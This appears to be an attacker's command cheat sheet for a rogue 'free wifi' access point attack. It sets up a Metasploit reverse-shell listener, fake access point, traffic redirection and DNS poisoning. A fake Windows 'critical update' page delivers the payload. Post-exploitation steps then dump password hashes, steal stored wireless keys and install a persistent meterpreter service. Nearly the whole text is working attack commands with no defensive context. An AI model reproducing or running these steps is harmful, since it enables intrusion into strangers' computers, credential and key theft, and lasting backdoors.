dhclient wlan0 //// Connect to the internet, can be eth0 *****Setup metasploit listener********* ///// u need to create the meterpreter reverse_tcp connection --- information is available in many places http://www.irongeek.com/i.php?page=videos/metasploit-create-reverse-meterpreter-payload-executable cd / cd pentest cd exploits cd framework3 ./msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.0.0.1 set LPORT 55555 show options exploit modprobe tun airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here ************************* Transparent Airbase ************************* su *************** ifconfig lo up ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address iptables -P FORWARD ACCEPT iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE wlan0 = route to the internet /etc/init.d/dhcp3-server restart // backtrack users use dhcpd /etc/init.d/lighttpd stop lighttpd -D -f '/home/hm/Desktop/http/http' //webserver with fake update page ********************************************************************** direct any request to apache iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 //redirector ********************************************************************** allow traffic again ifconfig lo up ifconfig at0 up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 iptables -P FORWARD ACCEPT iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE ************************************************************************** ************************************************************************** ************************************************************************** NON Transparent Airbase su *************** modprobe tun airbase-ng -P -C 30 -e "free wifi" wlan1 -v su *************** ifconfig at0 up ifconfig lo up ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1 iptables -P FORWARD ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 /etc/init.d/dhcp3-server restart /etc/init.d/lighttpd stop lighttpd -D -f '/home/hm/Desktop/http/http' cd / /// dnspoison available at http://dnspentest.sourceforge.net/ cd home cd hm cd Desktop cd dnspoison java ServerKernelMain 10.0.0.1 10.0.0.1 **************************************************************************** **** Check for victims ******** arp -n -v -i at0 session - l session -i sysinfo getuid use priv hashdump ***download keys***** mkdir c:\\windows\\wkviewer4 cd \ cd windows cd wkviewer upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless key viewer upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... check below upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4 upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server execute -H -f wkv.bat cat wkv.txt download wkv.txt /home/hm/Desktop/http/wkv.txt misc...... wkv bat file = wkv.exe /stabular wkv.txt metsvc.exe install-service Index html - Untitled Document

t

Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required.